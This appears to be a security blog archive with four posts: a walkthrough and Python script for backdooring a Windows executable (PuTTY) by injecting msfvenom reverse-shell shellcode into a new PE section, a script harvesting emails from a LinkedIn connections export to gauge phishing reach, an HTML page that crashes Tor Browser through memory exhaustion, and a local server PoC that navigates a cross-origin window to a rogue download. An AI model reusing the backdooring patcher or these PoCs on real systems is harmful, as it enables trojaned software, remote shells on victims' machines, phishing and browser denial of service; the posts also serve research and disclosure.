Friday 26 January 2018

Backdooring a Windows Binary

Hi Internet,

I have seen several write-ups of this technique, mostly from researchers who have done OSCE, so I decided to reproduce it and it worked. I am not much of a Windows exploitation person (I mostly deal with browser exploitation), and I have borrowed freely from the work of other researchers; there are already many posts on this. In this example I used PuTTY, but any executable should do; you can download PuTTY from here.

First, add a new section to the executable with a PE editor such as LordPE. Give the section read, write and execute characteristics, because we are going to write shellcode into it and then execute it from there.

Remember to allocate enough space; I gave the .NewSec section 1000 bytes. At this point the application will not run properly yet, because the section header now claims 1000 bytes of raw data that do not exist in the file. Open the modified binary in a hex editor and append 1000 bytes of padding (null bytes) at the end of the file to back the new section.
Save the binary; the application should now run normally. Open it in a debugger and note the first few instructions at the entry point (the first five in this case). Copy them somewhere, because the jump we are about to write will overwrite them and we will have to replay them later.

In the debugger, open the memory view to find the address of .NewSec.
In my case the address was 00376000. We want execution to jump there, since that is where the shellcode will live, so overwrite the first instruction at the entry point with JMP 00376000.

Double-click the newly written JMP to follow it into the .NewSec section. You should see a lot of free space. Add two instructions there, PUSHAD and PUSHFD, to preserve the current registers and flags.

Now that the registers and flags are saved on the stack, add the shellcode right after them, from 00376000 onwards. The shellcode can be generated with msfvenom (MSF).
Paste the shellcode into the debugger as a 'binary paste' starting at 00376000. After the shellcode, restore the saved state with POPFD and POPAD, replay the original instructions you copied earlier, and JMP back to the first instruction at the entry point that you did not overwrite; without this the program never resumes.
Save the changes, set up a listener, and run the executable. If our evilness works we should get a shell on the box.
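The following script is an added example and is not code from the original post; it automates the code-cave part of the procedure above (save state, shellcode, restore state, replay the displaced instructions, jump back) and writes it into the section added with LordPE. It assumes a 32-bit target, as in the PuTTY walkthrough; the virtual addresses, file offsets and section size are read off LordPE and the debugger and passed in, so the script does no PE parsing itself. All addresses in the demo and the three-byte INT3 placeholder shellcode are constructed values, not PuTTY's.

```python
import struct

# Added example, not the post's code. x86 (32-bit) only.
# VAs and file offsets come from the PE editor/debugger; the values used in the
# demo below are illustrative, not taken from PuTTY.

PUSHAD, PUSHFD, POPFD, POPAD = b"\x60", b"\x9c", b"\x9d", b"\x61"


def jmp_rel32(from_va: int, to_va: int) -> bytes:
    """Encode `JMP rel32` (E9 xx xx xx xx) placed at from_va and landing on to_va.
    The displacement is relative to the end of the 5-byte instruction."""
    rel = (to_va - (from_va + 5)) & 0xFFFFFFFF
    return b"\xe9" + struct.pack("<I", rel)


def jmp_target(at_va: int, insn: bytes) -> int:
    """Decode where a `JMP rel32` located at at_va goes (used to double-check)."""
    if len(insn) < 5 or insn[0] != 0xE9:
        raise ValueError("not a JMP rel32")
    rel = struct.unpack("<i", insn[1:5])[0]
    return (at_va + 5 + rel) & 0xFFFFFFFF


def build_cave(cave_va, entry_va, orig_insns, shellcode, esp_fix=0):
    """Lay out the new section: save state, run shellcode, restore, replay, return.

    orig_insns: the whole instructions displaced by the 5-byte JMP at the entry
      point (>= 5 bytes; they must not be relative jumps/calls, because they are
      replayed at a different address).
    esp_fix: number of bytes to add back to ESP if the shellcode leaves ESP lower
      than it found it (read the delta off the debugger after the shellcode's last
      instruction); 0 means no adjustment.
    """
    if len(orig_insns) < 5:
        raise ValueError("need at least 5 bytes of displaced instructions")
    cave = PUSHAD + PUSHFD + shellcode
    if esp_fix:
        # ADD ESP, imm32  (81 C4 imm32)
        cave += b"\x81\xc4" + struct.pack("<I", esp_fix & 0xFFFFFFFF)
    cave += POPFD + POPAD + orig_insns
    # jump back to the first original instruction we did NOT displace
    cave += jmp_rel32(cave_va + len(cave), entry_va + len(orig_insns))
    return cave


def entry_patch(entry_va, cave_va, orig_len):
    """Replace the displaced instructions with JMP cave plus NOP padding."""
    if orig_len < 5:
        raise ValueError("need at least 5 bytes at the entry point")
    return jmp_rel32(entry_va, cave_va) + b"\x90" * (orig_len - 5)


def patch_image(data, entry_off, entry_va, cave_off, cave_va, cave_size,
                orig_len, shellcode, esp_fix=0):
    """Return a patched copy of the PE bytes.
    entry_off / cave_off are file offsets of the entry point and of the new
    section's raw data (LordPE shows both); cave_size is the raw size you gave
    the section, so we refuse to overflow it."""
    img = bytearray(data)
    orig = bytes(img[entry_off:entry_off + orig_len])
    cave = build_cave(cave_va, entry_va, orig, shellcode, esp_fix)
    if len(cave) > cave_size:
        raise ValueError(f"cave needs {len(cave)} bytes, section has {cave_size}")
    img[cave_off:cave_off + len(cave)] = cave
    img[entry_off:entry_off + orig_len] = entry_patch(entry_va, cave_va, orig_len)
    return bytes(img)


def patch_file(src, dst, **kw):
    with open(src, "rb") as f:
        data = f.read()
    with open(dst, "wb") as f:
        f.write(patch_image(data, **kw))


if __name__ == "__main__":
    # Constructed demo: a 6-byte prologue (push ebp; mov ebp,esp; sub esp,10h)
    # at a made-up entry VA, INT3s standing in for msfvenom output.
    demo = build_cave(0x00376000, 0x00454A00,
                      b"\x55\x8b\xec\x83\xec\x10", b"\xcc" * 3)
    print("cave:", demo.hex(" "))
    print("entry:", entry_patch(0x00454A00, 0x00376000, 6).hex(" "))
```

Generate the payload with `msfvenom ... -f python` and paste the bytes in as `shellcode`. Two things still have to be checked in the debugger: a stock msfvenom reverse shell ends by waiting forever on the spawned process and then exiting, so the program would never reach the POPFD, and the usual fix in these write-ups is to patch that wait; and the shellcode leaves ESP lower than it found it, which is what the `esp_fix` argument adds back so that POPFD/POPAD restore the right values.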

I have recorded a video PoC using cmd.exe, which Microsoft implements through the Win32 console.

Tools such as the Backdoor Factory or msfvenom (with -x to use an existing executable as the template and -k to keep its original behaviour) can automate backdooring Windows executables.


Regards
Dhiraj

Monday 27 November 2017

Go ahead and get the email of all your LinkedIn connections

Hi Internet,

Found something interesting today at LinkedIn, but I believe it is more of a privacy issue than a security one, or it might just be intended functionality :/

Have you ever wondered how you end up receiving spam or phishing mails?

You: I have no idea how the attacker got my email address.

Well, this might be one of the ways.

Here is how you can export the details of your connections from your LinkedIn account.

Visit this link as a logged-in user; it should look something like this.

Select the radio button labelled "The works: All of the individual files plus more." and request the archive.

Wait a few seconds; once it is ready you will be able to download the archive, and you will see something like this.

Once downloaded, the archive contains several files, such as:

Opening Connections.csv gives you the details of each of your connections, such as name, email address and company. Anyone you accept as a connection can do the same with your own details, which is why a single bogus profile with a large network is a useful starting point for a phishing list.
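As an added example (not code from the original post), the script below parses a Connections.csv export and summarises what it leaks: how many connections expose an address and which mail domains dominate, which is exactly the view a phisher who managed to connect with you would get. The column names are taken from the export format described above and may differ in newer exports; the CSV embedded in the script is constructed sample data, not real connections.

```python
import csv
import io
from collections import Counter

# Added example, not the post's code. Column names are an assumption based on
# the export shown above; adjust if your Connections.csv differs.
EMAIL_COL = "Email Address"
COMPANY_COL = "Company"

# Constructed sample data, not a real export.
SAMPLE_CSV = """First Name,Last Name,Email Address,Company,Position,Connected On
Alice,Example,alice@example.com,Example Corp,Engineer,01 Jan 2017
Bob,Sample,bob@corp.example,Corp Example,Analyst,02 Feb 2017
Carol,Test,,Example Corp,Manager,03 Mar 2017
Dave,Demo,DAVE@Example.COM,Demo Ltd,CISO,04 Apr 2017
"""


def load_connections(text):
    """Return the rows of Connections.csv as dicts.

    Some exports put free-text notes above the header line (assumption), so we
    scan for the first line that mentions the e-mail column and start there."""
    lines = text.splitlines()
    start = next((i for i, line in enumerate(lines) if EMAIL_COL in line), None)
    if start is None:
        raise ValueError(f"no header line containing {EMAIL_COL!r}")
    return list(csv.DictReader(io.StringIO("\n".join(lines[start:]))))


def exposure_report(rows):
    """Summarise what the export exposes: distinct addresses, domains, companies."""
    emails = sorted({
        r[EMAIL_COL].strip().lower()
        for r in rows
        if (r.get(EMAIL_COL) or "").strip()
    })
    domains = Counter(e.rsplit("@", 1)[1] for e in emails)
    companies = Counter(
        (r.get(COMPANY_COL) or "").strip()
        for r in rows
        if (r.get(EMAIL_COL) or "").strip()
    )
    return {
        "connections": len(rows),
        "with_email": len(emails),
        "emails": emails,
        "top_domains": domains.most_common(),
        "companies_with_email": dict(companies),
    }


def report_from_file(path):
    with open(path, newline="", encoding="utf-8-sig") as f:
        return exposure_report(load_connections(f.read()))


if __name__ == "__main__":
    rep = exposure_report(load_connections(SAMPLE_CSV))
    print(f"{rep['with_email']} of {rep['connections']} connections expose an address")
    for domain, n in rep["top_domains"]:
        print(f"  {domain}: {n}")
```

Run it as `report_from_file("Connections.csv")` against a real export; the domain ranking shows at a glance which organisations a spear-phishing campaign built on your network would reach.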

Regards
Dhiraj


Tuesday 24 October 2017

Tor Browser IPC crash at MOZ_CRASH()

Hi Internet,
 
IPC (inter-process communication) is how Firefox's processes and threads exchange messages; IPDL (Inter-process-communication Protocol Definition Language) is the Mozilla-specific language in which those message protocols are defined, so that messages are passed between processes and threads in a controlled way.

Note: most IPC-based crashes in browsers are not eligible for bug bounty. //Not sure

Snippet:

<!DOCTYPE html>
<html>
<head>
<script>
function tor() {
    // Start with four bytes and double the string on every iteration;
    // each document.write() hands an ever larger payload to the page.
    var uristring = unescape("%u4141%u4141");
    for (var i = 0; i <= 50; ++i) {
        uristring += uristring;
        document.write(uristring);
    }
    document.write(uristring);
}
</script>
</head>
<body onload="tor()">
</body>
</html>


Running the above code in Tor Browser crashes the tab: 'Gah! This tab has crashed.'

Running Tor Browser in debug mode produced the error below:

So this seems to be a kind of resource-exhaustion attack that leads to a crash in Tor Browser. In vanilla Firefox, for instance, the same page freezes the tab, and if you disable multiprocess mode you can witness that behaviour in Tor Browser as well.

Running the snippet against an ASan build gives:

Looking at the code in question you'll see:
#ifdef MOZ_CRASHREPORTER
      CrashReporter::AnnotateCrashReport(NS_LITERAL_CSTRING("IPCMessageName"), nsDependentCString(msg->name()));
      CrashReporter::AnnotateCrashReport(NS_LITERAL_CSTRING("IPCMessageSize"), nsPrintfCString("%d", msg->size()));
#endif
      MOZ_CRASH("IPC message size is too large");

So what seems to be happening is that without --disable-crashreporter (the default for vanilla Firefox builds) the tab loading the code is stuck in the #ifdef MOZ_CRASHREPORTER block, while Tor Browser (which is built with --disable-crashreporter) hits the MOZ_CRASH() call directly.

It crashes at MOZ_CRASH() because the IPC message is too large. Tor marked this issue as informative via HackerOne (H1).


Monday 24 April 2017

Navigating to non-same origin windows in browsers.

Let's do this. It works in almost every browser, and it is another interesting navigation trick. It is a little-known property of web browsers that one document can always navigate other, non-same-origin windows to arbitrary URLs. Perhaps more interestingly, you can also navigate third-party documents to resources served with Content-Disposition: attachment, in which case you get the original contents of the address bar plus a rogue download prompt attached to an unsuspecting page that never wanted you to download that file.
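The following is an added example and not the original PoC: a local harness that reproduces the exchange described above. The attacker page served at `/` opens a window on a non-same-origin site and, once it has rendered, assigns that window's `location` to `/download` on the attacker's origin, which answers with `Content-Disposition: attachment`. The victim URL, port, file name and the placeholder attachment body are all assumptions for illustration.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

# Added example, not the original PoC. Values below are illustrative assumptions.
VICTIM_URL = "https://example.com/"
ATTACHMENT_NAME = "statement.pdf"
PORT = 8000

# The attacker page. Any handle to the victim window works: window.open(),
# an iframe's contentWindow, or window.opener on a page the victim opened.
ATTACKER_HTML = f"""<!doctype html>
<title>navigate a non-same-origin window</title>
<button id="go">open victim</button>
<script>
  let victim;
  document.getElementById("go").onclick = () => {{
    victim = window.open({VICTIM_URL!r}, "victim");
    // Once the victim has rendered, navigate it (cross-origin, which browsers
    // allow) to an attachment URL on our origin. The relative URL resolves
    // against this page, not the victim. The victim's address bar stays, and
    // the download prompt appears on top of the victim page.
    setTimeout(() => {{ victim.location = "/download"; }}, 3000);
  }};
</script>
"""


def attachment_headers(filename):
    """Headers that make a navigation end in a download prompt, not a page."""
    return {
        "Content-Type": "application/octet-stream",
        "Content-Disposition": f'attachment; filename="{filename}"',
    }


def route(path):
    """Map a request path to (status, headers, body).
    Kept separate from the handler so it can be exercised without a socket."""
    if path == "/":
        return 200, {"Content-Type": "text/html; charset=utf-8"}, ATTACKER_HTML.encode()
    if path == "/download":
        # Constructed placeholder body, not a real document.
        body = b"%PDF-1.4\n% constructed placeholder, not a real document\n"
        return 200, attachment_headers(ATTACHMENT_NAME), body
    return 404, {"Content-Type": "text/plain"}, b"not found\n"


class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        status, headers, body = route(self.path)
        self.send_response(status)
        for name, value in headers.items():
            self.send_header(name, value)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


if __name__ == "__main__":
    print(f"attacker page on http://127.0.0.1:{PORT}/ (open it and click the button)")
    HTTPServer(("127.0.0.1", PORT), Handler).serve_forever()
```

Run the script, open the attacker page and click the button; after three seconds the victim window should keep its own address bar while showing a download prompt for `statement.pdf`. Two caveats: the report above was closed as intended behaviour, and browsers have since changed how and where downloads are surfaced, so the visual result differs by version; and a victim site that sends `Cross-Origin-Opener-Policy` gets its window handle severed from the opener, which removes the handle this trick relies on.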

Video POC :

No bounty was awarded, because :
"The behavioral of the browser is legit, the same thing happens in chrome or other browsers. We will invalidate your report."

Bug Reported by : Dhiraj Mishra  